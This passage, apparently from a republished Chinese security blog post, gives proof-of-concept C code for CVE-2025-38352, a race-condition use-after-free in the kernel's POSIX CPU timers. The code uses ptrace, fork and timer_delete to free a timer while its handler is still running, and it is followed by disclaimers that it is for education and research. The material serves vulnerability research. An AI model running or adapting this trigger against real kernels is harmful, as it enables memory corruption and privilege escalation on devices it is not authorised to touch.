&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_sec&nbsp;=&nbsp;0,
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .tv_nsec&nbsp;= wait_time,&nbsp;// Custom wait time
&nbsp; &nbsp; &nbsp; &nbsp; },
&nbsp; &nbsp; };

// Wait for parent to attach
pthread_barrier_wait(&barrier);

SYSCHK(timer_settime(timer,&nbsp;0, &ts,&nbsp;NULL));

// Use some CPU time to make sure the timer will fire correctly
for&nbsp;(int&nbsp;i =&nbsp;0; i <&nbsp;1000000; i++);

return;
}

intmain(int&nbsp;argc,&nbsp;char&nbsp;*argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if&nbsp;(argc >&nbsp;1) {
&nbsp; &nbsp; &nbsp; &nbsp; wait_time =&nbsp;strtol(argv[1],&nbsp;NULL,&nbsp;10);
printf("Custom wait time:&nbsp;%ld\n", wait_time);
&nbsp; &nbsp; }
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));

pid_t&nbsp;pid =&nbsp;SYSCHK(fork());

if&nbsp;(pid) {
// parent
pin_on_cpu(1);
char&nbsp;m;
close(c2p[1]);
close(p2c[0]);

// Receive child process's REAPEE thread'sTID
pid_t&nbsp;tid;
SYSCHK(read(c2p[0], &tid,&nbsp;sizeof(pid_t)));
printf("Parent: reapee thread ID:&nbsp;%d\n", tid);

// Attach and continue
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid,&nbsp;NULL,&nbsp;NULL));
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid,&nbsp;NULL,&nbsp;NULL));

// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid,&nbsp;NULL, __WALL));
printf("Parent: detached from REAPEE\n");

// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m,&nbsp;1));

// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m,&nbsp;1));
&nbsp; &nbsp; }&nbsp;else&nbsp;{
// child
pin_on_cpu(0);
char&nbsp;m;
close(c2p[0]);
close(p2c[1]);

prctl(PR_SET_NAME,&nbsp;"CHILD_MAIN");
pthread_barrier_init(&barrier,&nbsp;NULL,&nbsp;2);
pthread_create(&reapee_thread,&nbsp;NULL, (void*)reapee,&nbsp;NULL);

printf("Thread created\n");

// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m,&nbsp;1));
pthread_barrier_wait(&barrier);

// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m,&nbsp;1));
timer_delete(timer);
printf("Child: timer deleted\n");

// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m,&nbsp;1));
pause();
&nbsp; &nbsp; }
}

CVE-2025-38352 (Part 1) – In-the-wild Android Kernel Vulnerability Analysis + PoC

免责声明：本博客文章仅用于教育和研究目的。提供的所有技术和代码示例旨在帮助防御者理解攻击手法并提高安全态势。请勿使用此信息访问或干扰您不拥有或没有明确测试权限的系统。未经授权的使用可能违反法律和道德准则。作者对因应用所讨论概念而导致的任何误用或损害不承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：securitainment Faraz Faraz《CVE-2025-38352 Part 1 – 在野利用的 Android Kernel 竞争 UAF 分析与 PoC》